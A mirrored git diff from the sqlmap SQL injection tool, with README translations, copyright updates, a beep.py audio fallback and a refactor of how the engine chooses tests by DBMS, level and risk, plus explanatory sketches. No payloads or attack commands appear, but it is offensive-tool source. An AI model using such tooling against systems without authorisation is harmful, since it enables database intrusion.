mirror of https://github.com/sqlmapproject/sqlmap.git
synced 2025-07-30 18:10:12 +03:00

commit 1423814773
Merge pull request #1 from sqlmapproject/master

.gitattributes (vendored) | 1
@@ -1,4 +1,5 @@
 *.py text eol=lf
+*.conf text eol=lf
 
 *_ binary
 *.dll binary
@@ -55,5 +55,8 @@ Links
 Translations
 ----
 
-* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
+* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md)
+* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md)
+* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md)
 * [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
+* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
@@ -1,12 +1,12 @@
 COPYING -- Describes the terms under which sqlmap is distributed. A copy
 of the GNU General Public License (GPL) is appended to this file.
 
-sqlmap is (C) 2006-2013 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
+sqlmap is (C) 2006-2015 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
 
 This program is free software; you may redistribute and/or modify it under
 the terms of the GNU General Public License as published by the Free
-Software Foundation; Version 2 with the clarifications and exceptions
-described below. This guarantees your right to use, modify, and
+Software Foundation; Version 2 (or later) with the clarifications and
+exceptions described below. This guarantees your right to use, modify, and
 redistribute this software under certain conditions. If you wish to embed
 sqlmap technology into proprietary software, we sell alternative licenses
 (contact sales@sqlmap.org).
507  doc/THANKS.md
File diff suppressed because it is too large
@@ -20,6 +20,8 @@ This file lists bundled packages and their associated licensing terms.
 * The Oset library located under thirdparty/oset/.
 Copyright (C) 2010, BlueDynamics Alliance, Austria.
 Copyright (C) 2009, Raymond Hettinger, and others.
+* The PrettyPrint library located under thirdparty/prettyprint/.
+Copyright (C) 2010, Chris Hall.
 * The SocksiPy library located under thirdparty/socks/.
 Copyright (C) 2006, Dan-Haim.
 

@@ -55,7 +57,7 @@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 Copyright (C) 2008-2009, Jose Fonseca.
 * The KeepAlive library located under thirdparty/keepalive/.
 Copyright (C) 2002-2003, Michael D. Stenner.
-* The MultipartPost library located under thirdparty/multipartpost/.
+* The MultipartPost library located under thirdparty/multipart/.
 Copyright (C) 2006, Will Holcomb.
 * The XDot library located under thirdparty/xdot/.
 Copyright (C) 2008, Jose Fonseca.

@@ -281,8 +283,6 @@ be bound by the terms and conditions of this License Agreement.
 Copyright (C) 2012, Marcel Hellkamp.
 * The PageRank library located under thirdparty/pagerank/.
 Copyright (C) 2010, Corey Goldberg.
-* The PrettyPrint library located under thirdparty/prettyprint/.
-Copyright (C) 2010, Chris Hall.
 * The Termcolor library located under thirdparty/termcolor/.
 Copyright (C) 2008-2011, Volvox Development Team.
 
53  doc/translations/README-gr-GR.md  (new file)
@@ -0,0 +1,53 @@
+sqlmap
+==
+
+
+Το sqlmap είναι πρόγραμμα ανοιχτού κώδικα, που αυτοματοποιεί την εύρεση και εκμετάλλευση ευπαθειών τύπου SQL Injection σε βάσεις δεδομένων. Έρχεται με μια δυνατή μηχανή αναγνώρισης ευπαθειών, πολλά εξειδικευμένα χαρακτηριστικά για τον απόλυτο penetration tester όπως και με ένα μεγάλο εύρος επιλογών αρχίζοντας από την αναγνώριση της βάσης δεδομένων, κατέβασμα δεδομένων της βάσης, μέχρι και πρόσβαση στο βαθύτερο σύστημα αρχείων και εκτέλεση εντολών στο απευθείας στο λειτουργικό μέσω εκτός ζώνης συνδέσεων.
+
+Εικόνες
+----
+
+
+
+Μπορείτε να επισκεφτείτε τη [συλλογή από εικόνες](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) που επιδεικνύουν κάποια από τα χαρακτηριστικά.
+
+Εγκατάσταση
+----
+
+Έχετε τη δυνατότητα να κατεβάσετε την τελευταία tarball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/tarball/master) ή την τελευταία zipball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+Κατά προτίμηση, μπορείτε να κατεβάσετε το sqlmap κάνοντας κλώνο το [Git](https://github.com/sqlmapproject/sqlmap) αποθετήριο:
+
+    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+Το sqlmap λειτουργεί χωρίς περαιτέρω κόπο με την [Python](http://www.python.org/download/) έκδοσης **2.6.x** και **2.7.x** σε όποια πλατφόρμα.
+
+Χρήση
+----
+
+Για να δείτε μια βασική λίστα από επιλογές πατήστε:
+
+    python sqlmap.py -h
+
+Για να πάρετε μια λίστα από όλες τις επιλογές πατήστε:
+
+    python sqlmap.py -hh
+
+Μπορείτε να δείτε ένα δείγμα λειτουργίας του προγράμματος [εδώ](https://gist.github.com/stamparm/5335217).
+Για μια γενικότερη άποψη των δυνατοτήτων του sqlmap, μια λίστα των υποστηριζόμενων χαρακτηριστικών και περιγραφή για όλες τις επιλογές, μαζί με παραδείγματα, καλείστε να συμβουλευτείτε το [εγχειρίδιο χρήστη](https://github.com/sqlmapproject/sqlmap/wiki).
+
+Σύνδεσμοι
+----
+
+* Αρχική σελίδα: http://sqlmap.org
+* Λήψεις: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ή [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Προβλήματα: https://github.com/sqlmapproject/sqlmap/issues
+* Εγχειρίδιο Χρήστη: https://github.com/sqlmapproject/sqlmap/wiki
+* Συχνές Ερωτήσεις (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Εγγραφή σε Mailing list: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
+* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
+* Mailing list αρχείο: http://news.gmane.org/gmane.comp.security.sqlmap
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* Εικόνες: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
53  doc/translations/README-hr-HR.md  (new file)
@@ -0,0 +1,53 @@
+sqlmap
+==
+
+
+sqlmap je alat namijenjen za penetracijsko testiranje koji automatizira proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije te preuzimanje poslužitelja baze podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko dohvaćanja podataka iz baze, do pristupa zahvaćenom datotečnom sustavu i izvršavanja komandi na operacijskom sustavu korištenjem tzv. "out-of-band" veza.
+
+Slike zaslona
+----
+
+
+
+Možete posjetiti [kolekciju slika zaslona](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) gdje se demonstriraju neke od značajki na wiki stranicama.
+
+Instalacija
+----
+
+Možete preuzeti zadnji tarball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/tarball/master) ili zadnji zipball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+Po mogućnosti, možete preuzeti sqlmap kloniranjem [Git](https://github.com/sqlmapproject/sqlmap) repozitorija:
+
+    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap radi bez posebnih zahtjeva korištenjem [Python](http://www.python.org/download/) verzije **2.6.x** i/ili **2.7.x** na bilo kojoj platformi.
+
+Korištenje
+----
+
+Kako biste dobili listu osnovnih opcija i prekidača koristite:
+
+    python sqlmap.py -h
+
+Kako biste dobili listu svih opcija i prekidača koristite:
+
+    python sqlmap.py -hh
+
+Možete pronaći primjer izvršavanja [ovdje](https://gist.github.com/stamparm/5335217).
+Kako biste dobili pregled mogućnosti sqlmap-a, liste podržanih značajki te opis svih opcija i prekidača, zajedno s primjerima, preporučen je uvid u [korisnički priručnik](https://github.com/sqlmapproject/sqlmap/wiki).
+
+Poveznice
+----
+
+* Početna stranica: http://sqlmap.org
+* Preuzimanje: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ili [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* RSS feed promjena u kodu: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Prijava problema: https://github.com/sqlmapproject/sqlmap/issues
+* Korisnički priručnik: https://github.com/sqlmapproject/sqlmap/wiki
+* Najčešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Pretplata na mailing listu: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
+* RSS feed mailing liste: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
+* Arhiva mailing liste: http://news.gmane.org/gmane.comp.security.sqlmap
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* Demo: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* Slike zaslona: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
52  doc/translations/README-zh-CN.md  (new file)
@@ -0,0 +1,52 @@
+sqlmap
+==
+
+
+sqlmap 是一个开源的渗透测试工具，可以用来自动化的检测，利用SQL注入漏洞，获取数据库服务器的权限。它具有功能强大的检测引擎，针对各种不同类型数据库的渗透测试的功能选项，包括获取数据库中存储的数据，访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
+
+演示截图
+----
+
+
+
+你可以访问 wiki上的 [截图](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) 查看各种用法的演示
+
+安装方法
+----
+
+你可以点击 [这里](https://github.com/sqlmapproject/sqlmap/tarball/master) 下载最新的 `tar` 打包的源代码 或者点击 [这里](https://github.com/sqlmapproject/sqlmap/zipball/master)下载最新的 `zip` 打包的源代码.
+
+推荐你从 [Git](https://github.com/sqlmapproject/sqlmap) 仓库获取最新的源代码:
+
+    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap 可以运行在 [Python](http://www.python.org/download/) **2.6.x** 和 **2.7.x** 版本的任何平台上
+
+使用方法
+----
+
+通过如下命令可以查看基本的用法及命令行参数:
+
+    python sqlmap.py -h
+
+通过如下的命令可以查看所有的用法及命令行参数:
+
+    python sqlmap.py -hh
+
+你可以从 [这里](https://gist.github.com/stamparm/5335217) 看到一个sqlmap 的使用样例。除此以外，你还可以查看 [使用手册](https://github.com/sqlmapproject/sqlmap/wiki)。获取sqlmap所有支持的特性、参数、命令行选项开关及说明的使用帮助。
+
+链接
+----
+
+* 项目主页: http://sqlmap.org
+* 源代码下载: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* RSS 订阅: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
+* 使用手册: https://github.com/sqlmapproject/sqlmap/wiki
+* 常见问题 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* 邮件讨论列表: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
+* 邮件列表 RSS 订阅: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
+* 邮件列表归档: http://news.gmane.org/gmane.comp.security.sqlmap
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* 教程: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* 截图: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -3,7 +3,7 @@
 """
 beep.py - Make a beep sound
 
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -45,6 +45,10 @@ def _win_wav_play(filename):
     winsound.PlaySound(filename, winsound.SND_FILENAME)
 
 def _linux_wav_play(filename):
+    for _ in ("aplay", "paplay", "play"):
+        if not os.system("%s '%s' 2>/dev/null" % (_, filename)):
+            return
+
     import ctypes
 
     PA_STREAM_PLAYBACK = 1
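The added lines make `_linux_wav_play()` try common command-line players before falling back to the ctypes/PulseAudio path. A standalone sketch of that fallback (not sqlmap's module, just the idea; `os.system()` returns 0 on success):

```python
import os

def play_wav(filename):
    # Try common CLI audio players in order; stop at the first that succeeds.
    for player in ("aplay", "paplay", "play"):
        if os.system("%s '%s' 2>/dev/null" % (player, filename)) == 0:
            return True
    return False    # caller would fall back to library-based playback
```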
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

@@ -3,7 +3,7 @@
 """
 cloak.py - Simple file encryption/compression utility
 
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

@@ -3,7 +3,7 @@
 """
 dbgtool.py - Portable executable to ASCII debug script converter
 
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -3,7 +3,7 @@
 """
 safe2bin.py - Simple safe(hex) to binary format converter
 
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -1,6 +1,6 @@
 #!/usr/bin/env python
 
-# Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 # See the file 'doc/COPYING' for copying permission
 
 # Removes duplicate entries in wordlist like files

@@ -1,6 +1,6 @@
 #!/usr/bin/env python
 
-# Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 # See the file 'doc/COPYING' for copying permission
 
 import codecs
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -15,7 +15,6 @@ from subprocess import Popen as execute
 
 from extra.beep.beep import beep
 from lib.core.agent import agent
-from lib.core.common import arrayizeValue
 from lib.core.common import Backend
 from lib.core.common import extractRegexResult
 from lib.core.common import extractTextTagContent
@@ -46,7 +45,6 @@ from lib.core.datatype import AttribDict
 from lib.core.datatype import InjectionDict
 from lib.core.decorators import cachedmethod
 from lib.core.dicts import FROM_DUMMY_TABLE
-from lib.core.enums import CUSTOM_LOGGING
 from lib.core.enums import DBMS
 from lib.core.enums import HEURISTIC_TEST
 from lib.core.enums import HTTP_HEADER
@@ -54,18 +52,21 @@ from lib.core.enums import HTTPMETHOD
 from lib.core.enums import NULLCONNECTION
 from lib.core.enums import PAYLOAD
 from lib.core.enums import PLACE
+from lib.core.enums import REDIRECTION
 from lib.core.exception import SqlmapConnectionException
 from lib.core.exception import SqlmapNoneDataException
 from lib.core.exception import SqlmapSilentQuitException
 from lib.core.exception import SqlmapUserQuitException
+from lib.core.settings import DEFAULT_GET_POST_DELIMITER
+from lib.core.settings import DUMMY_XSS_CHECK_APPENDIX
 from lib.core.settings import FORMAT_EXCEPTION_STRINGS
 from lib.core.settings import HEURISTIC_CHECK_ALPHABET
 from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH
-from lib.core.settings import UNKNOWN_DBMS
+from lib.core.settings import SUPPORTED_DBMS
 from lib.core.settings import URI_HTTP_HEADER
-from lib.core.settings import LOWER_RATIO_BOUND
 from lib.core.settings import UPPER_RATIO_BOUND
 from lib.core.settings import IDS_WAF_CHECK_PAYLOAD
+from lib.core.settings import IDS_WAF_CHECK_RATIO
 from lib.core.threads import getCurrentThreadData
 from lib.request.connect import Connect as Request
 from lib.request.inject import checkBooleanExpression
@@ -84,31 +85,53 @@ def checkSqlInjection(place, parameter, value):
     # Set the flag for SQL injection test mode
     kb.testMode = True
 
-    for test in getSortedInjectionTests():
+    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
+    tests = getSortedInjectionTests()
+    seenPayload = set()
+
+    while tests:
+        test = tests.pop(0)
+
         try:
             if kb.endDetection:
                 break
 
             if conf.dbms is None:
+                # If the DBMS has not yet been fingerprinted (via simple heuristic check
+                # or via DBMS-specific payload) and boolean-based blind has been identified
+                # then attempt to identify with a simple DBMS specific boolean-based
+                # test what the DBMS may be
                 if not injection.dbms and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data:
-                    if not Backend.getIdentifiedDbms() and not kb.heuristicDbms:
-                        kb.heuristicDbms = heuristicCheckDbms(injection) or UNKNOWN_DBMS
+                    if not Backend.getIdentifiedDbms() and kb.heuristicDbms is False:
+                        kb.heuristicDbms = heuristicCheckDbms(injection)
 
-                if not conf.testFilter and (Backend.getErrorParsedDBMSes() or kb.heuristicDbms) not in ([], None, UNKNOWN_DBMS):
-                    if kb.reduceTests is None and Backend.getErrorParsedDBMSes():
-                        msg = "heuristic (parsing) test showed that the "
-                        msg += "back-end DBMS could be '%s'. " % (Format.getErrorParsedDBMSes() if Backend.getErrorParsedDBMSes() else kb.heuristicDbms)
-                        msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]"
-                        kb.reduceTests = [] if readInput(msg, default='Y').upper() != 'Y' else (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms])
+                # If the DBMS has already been fingerprinted (via DBMS-specific
+                # error message, simple heuristic check or via DBMS-specific
+                # payload), ask the user to limit the tests to the fingerprinted
+                # DBMS
+                if kb.reduceTests is None and not conf.testFilter and (intersect(Backend.getErrorParsedDBMSes(), \
+                   SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):
+                    msg = "it looks like the back-end DBMS is '%s'. " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
+                    msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]"
+                    kb.reduceTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y').upper() == 'Y' else []
 
-                    if kb.extendTests is None:
-                        _ = (Format.getErrorParsedDBMSes() if Backend.getErrorParsedDBMSes() else kb.heuristicDbms)
-                        msg = "do you want to include all tests for '%s' " % _
-                        msg += "extending provided level (%d) and risk (%s)? [Y/n]" % (conf.level, conf.risk)
-                        kb.extendTests = [] if readInput(msg, default='Y').upper() != 'Y' else (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms])
+                # If the DBMS has been fingerprinted (via DBMS-specific error
+                # message, via simple heuristic check or via DBMS-specific
+                # payload), ask the user to extend the tests to all DBMS-specific,
+                # regardless of --level and --risk values provided
+                if kb.extendTests is None and not conf.testFilter and (conf.level < 5 or conf.risk < 3) \
+                   and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or \
+                   kb.heuristicDbms or injection.dbms):
+                    msg = "for the remaining tests, do you want to include all tests "
+                    msg += "for '%s' extending provided " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
+                    msg += "level (%d)" % conf.level if conf.level < 5 else ""
+                    msg += " and " if conf.level < 5 and conf.risk < 3 else ""
+                    msg += "risk (%d)" % conf.risk if conf.risk < 3 else ""
+                    msg += " values? [Y/n]" if conf.level < 5 and conf.risk < 3 else " value? [Y/n]"
+                    kb.extendTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y').upper() == 'Y' else []
 
             title = test.title
-            stype = test.stype
+            kb.testType = stype = test.stype
             clause = test.clause
             unionExtended = False
 
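The hunk above replaces the per-DBMS prompt logic: once error parsing, the heuristic check, or an earlier payload suggests a likely back-end DBMS, the user can reduce the remaining tests to that DBMS (or extend them past the configured level/risk). A minimal standalone sketch of the reduction idea, using hypothetical helper names rather than sqlmap's own API:

```python
def reduce_tests(tests, likely_dbms):
    """Keep generic tests plus tests matching any of the likely DBMSes.

    `tests` is a list of dicts with an optional "dbms" key (string or list of
    strings); `likely_dbms` is a set of DBMS names (may be empty = no hint).
    """
    kept = []
    for test in tests:
        dbms = test.get("dbms")
        if dbms is None:                      # generic test, always keep
            kept.append(test)
            continue
        dbms = [dbms] if isinstance(dbms, str) else dbms
        if not likely_dbms or likely_dbms.intersection(dbms):
            kept.append(test)
    return kept

if __name__ == "__main__":
    tests = [
        {"title": "AND boolean-based blind"},                       # generic
        {"title": "MySQL time-based blind", "dbms": "MySQL"},
        {"title": "PostgreSQL error-based", "dbms": "PostgreSQL"},
    ]
    print([t["title"] for t in reduce_tests(tests, {"MySQL"})])
```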
@@ -165,27 +188,56 @@ def checkSqlInjection(place, parameter, value):
             logger.debug(debugMsg)
             continue
 
-        # Skip DBMS-specific test if it does not match either the
-        # previously identified or the user's provided DBMS (either
-        # from program switch or from parsed error message(s))
+        # Parse DBMS-specific payloads' details
         if "details" in test and "dbms" in test.details:
-            dbms = test.details.dbms
+            payloadDbms = test.details.dbms
         else:
-            dbms = None
+            payloadDbms = None
 
-        # Skip tests if title is not included by the given filter
-        if conf.testFilter:
-            if not any(conf.testFilter in str(item) or re.search(conf.testFilter, str(item), re.I) for item in (test.title, test.vector, dbms)):
-                debugMsg = "skipping test '%s' because " % title
-                debugMsg += "its name/vector/dbms is not included by the given filter"
-                logger.debug(debugMsg)
-                continue
+        # Skip tests if title, vector or DBMS is not included by the
+        # given test filter
+        if conf.testFilter and not any(conf.testFilter in str(item) or \
+           re.search(conf.testFilter, str(item), re.I) for item in \
+           (test.title, test.vector, payloadDbms)):
+            debugMsg = "skipping test '%s' because its " % title
+            debugMsg += "name/vector/DBMS is not included by the given filter"
+            logger.debug(debugMsg)
+            continue
 
-        elif not (kb.extendTests and intersect(dbms, kb.extendTests)):
+        if payloadDbms is not None:
+            # Skip DBMS-specific test if it does not match the user's
+            # provided DBMS
+            if conf.dbms is not None and not intersect(payloadDbms, conf.dbms, True):
+                debugMsg = "skipping test '%s' because " % title
+                debugMsg += "the provided DBMS is %s" % conf.dbms
+                logger.debug(debugMsg)
+                continue
+
+            # Skip DBMS-specific test if it does not match the
+            # previously identified DBMS (via DBMS-specific payload)
+            if injection.dbms is not None and not intersect(payloadDbms, injection.dbms, True):
+                debugMsg = "skipping test '%s' because the identified " % title
+                debugMsg += "back-end DBMS is %s" % injection.dbms
+                logger.debug(debugMsg)
+                continue
+
+            # Skip DBMS-specific test if it does not match the
+            # previously identified DBMS (via DBMS-specific error message)
+            if kb.reduceTests and not intersect(payloadDbms, kb.reduceTests, True):
+                debugMsg = "skipping test '%s' because the parsed " % title
+                debugMsg += "error message(s) showed that the back-end DBMS "
+                debugMsg += "could be %s" % Format.getErrorParsedDBMSes()
+                logger.debug(debugMsg)
+                continue
+
+        # If the user did not decide to extend the tests to all
+        # DBMS-specific or the test payloads is not specific to the
+        # identified DBMS, then only test for it if both level and risk
+        # are below the corrisponding configuration's level and risk
+        # values
+        if not conf.testFilter and not (kb.extendTests and intersect(payloadDbms, kb.extendTests, True)):
             # Skip test if the risk is higher than the provided (or default)
             # value
-            # Parse test's <risk>
             if test.risk > conf.risk:
                 debugMsg = "skipping test '%s' because the risk (%d) " % (title, test.risk)
                 debugMsg += "is higher than the provided (%d)" % conf.risk
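The skip conditions above all hinge on a case-insensitive intersection between a payload's declared DBMS(es) and what is already known (user-forced DBMS, identified DBMS, or error-parsed candidates). An illustrative stand-in for that helper (sqlmap's real intersect() lives in lib/core/common.py; this sketch only mirrors the behaviour the hunk relies on):

```python
def intersect(a, b, lower=False):
    """Return the common elements of two values, each a scalar or a sequence."""
    to_list = lambda v: [v] if isinstance(v, str) else list(v or [])
    left, right = to_list(a), to_list(b)
    if lower:
        left = [str(_).lower() for _ in left]
        right = [str(_).lower() for _ in right]
    return [_ for _ in left if _ in right]

# A MySQL-specific payload is skipped when another DBMS has been forced:
print(bool(intersect("MySQL", "PostgreSQL", True)))          # False -> skip
print(bool(intersect(["MySQL", "MariaDB"], "mysql", True)))   # True  -> keep
```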
@@ -194,35 +246,12 @@ def checkSqlInjection(place, parameter, value):
 
             # Skip test if the level is higher than the provided (or default)
             # value
-            # Parse test's <level>
             if test.level > conf.level:
                 debugMsg = "skipping test '%s' because the level (%d) " % (title, test.level)
                 debugMsg += "is higher than the provided (%d)" % conf.level
                 logger.debug(debugMsg)
                 continue
 
-        if dbms is not None:
-            if injection.dbms is not None and not intersect(injection.dbms, dbms):
-                debugMsg = "skipping test '%s' because " % title
-                debugMsg += "the back-end DBMS identified is "
-                debugMsg += "%s" % injection.dbms
-                logger.debug(debugMsg)
-                continue
-
-            if conf.dbms is not None and not intersect(conf.dbms.lower(), [_.lower() for _ in arrayizeValue(dbms)]):
-                debugMsg = "skipping test '%s' because " % title
-                debugMsg += "the provided DBMS is %s" % conf.dbms
-                logger.debug(debugMsg)
-                continue
-
-            if kb.reduceTests and not intersect(dbms, kb.reduceTests):
-                debugMsg = "skipping test '%s' because " % title
-                debugMsg += "the parsed error message(s) showed "
-                debugMsg += "that the back-end DBMS could be "
-                debugMsg += "%s" % Format.getErrorParsedDBMSes()
-                logger.debug(debugMsg)
-                continue
-
         # Skip test if it does not match the same SQL injection clause
         # already identified by another test
         clauseMatch = False
@@ -234,11 +263,11 @@ def checkSqlInjection(place, parameter, value):
 
         if clause != [0] and injection.clause and injection.clause != [0] and not clauseMatch:
             debugMsg = "skipping test '%s' because the clauses " % title
-            debugMsg += "differs from the clause already identified"
+            debugMsg += "differ from the clause already identified"
             logger.debug(debugMsg)
             continue
 
-        # Skip test if the user provided custom character
+        # Skip test if the user provided custom character (for UNION-based payloads)
         if conf.uChar is not None and ("random number" in title or "(NULL)" in title):
             debugMsg = "skipping test '%s' because the user " % title
             debugMsg += "provided a specific character, %s" % conf.uChar
@@ -248,9 +277,9 @@ def checkSqlInjection(place, parameter, value):
         infoMsg = "testing '%s'" % title
         logger.info(infoMsg)
 
-        # Force back-end DBMS according to the current
-        # test value for proper payload unescaping
-        Backend.forceDbms(dbms[0] if isinstance(dbms, list) else dbms)
+        # Force back-end DBMS according to the current test DBMS value
+        # for proper payload unescaping
+        Backend.forceDbms(payloadDbms[0] if isinstance(payloadDbms, list) else payloadDbms)
 
         # Parse test's <request>
         comment = agent.getComment(test.request) if len(conf.boundaries) > 1 else None
@@ -268,7 +297,7 @@ def checkSqlInjection(place, parameter, value):
             # Skip boundary if the level is higher than the provided (or
             # default) value
             # Parse boundary's <level>
-            if boundary.level > conf.level:
+            if boundary.level > conf.level and not (kb.extendTests and intersect(payloadDbms, kb.extendTests, True)):
                 continue
 
             # Skip boundary if it does not match against test's <clause>
@@ -298,14 +327,13 @@ def checkSqlInjection(place, parameter, value):
             # Parse boundary's <prefix>, <suffix> and <ptype>
